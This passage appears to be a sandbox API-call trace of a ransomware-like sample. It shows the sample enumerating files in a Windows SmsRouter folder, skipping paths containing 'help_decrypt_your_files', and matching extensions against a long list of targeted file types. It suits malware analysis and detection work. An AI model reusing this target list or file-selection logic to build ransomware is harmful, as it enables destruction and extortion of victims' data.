x.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".jrs") returned 0x0
	[0176.498] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcaa32ae, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcaa32ae, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcaa32ae, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="edbres00002.jrs", cAlternateFileName="EDBRES~2.JRS")) returned 1
	[0176.498] lstrcmpW (lpString1="edbres00002.jrs", lpString2="..") returned 1
	[0176.498] lstrcmpW (lpString1="edbres00002.jrs", lpString2=".") returned 1
	[0176.498] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\") returned="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\"
	[0176.498] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\", lpString2="edbres00002.jrs" | out: lpString1="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\edbres00002.jrs") returned="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\edbres00002.jrs"
	[0176.498] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\edbres00002.jrs") returned 67
	[0176.498] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0176.498] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\edbres00002.jrs", cchLength=0x43 | out: lpsz="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\edbres00002.jrs") returned 0x43
	[0176.499] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.499] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\edbres00002.jrs", lpSrch="help_decrypt_your_files") returned 0x0
	[0176.499] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\edbres00002.jrs" | out: lpString1="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\edbres00002.jrs") returned="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\edbres00002.jrs"
	[0176.499] lstrlenW (lpString="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\edbres00002.jrs") returned 67
	[0176.499] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0176.499] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.499] StrStrW (lpFirst=".jrs", lpSrch=".") returned=".jrs"
	[0176.500] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.500] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".jrs") returned 0x0
	[0176.500] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbca7cf5a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbcb3bc1a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbcb3bc1a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="edbtmp.log", cAlternateFileName="")) returned 1
	[0176.500] lstrcmpW (lpString1="edbtmp.log", lpString2="..") returned 1
	[0176.500] lstrcmpW (lpString1="edbtmp.log", lpString2=".") returned 1
	[0176.500] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\") returned="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\"
	[0176.500] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\", lpString2="edbtmp.log" | out: lpString1="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\edbtmp.log") returned="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\edbtmp.log"
	[0176.500] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\edbtmp.log") returned 62
	[0176.501] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0176.501] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\SmsRouter\\MessageStore\\edbtmp.log", cchLength=0x3e | out: lpsz="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\edbtmp.log") returned 0x3e
	[0176.501] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.501] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\edbtmp.log", lpSrch="help_decrypt_your_files") returned 0x0
	[0176.501] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\edbtmp.log" | out: lpString1="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\edbtmp.log") returned="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\edbtmp.log"
	[0176.501] lstrlenW (lpString="c:\\users\\all users\\microsoft\\smsrouter\\messagestore\\edbtmp.log") returned 62
	[0176.501] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0176.502] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.502] StrStrW (lpFirst=".log", lpSrch=".") returned=".log"
	[0176.502] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.502] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".log") returned=".log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0176.502] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
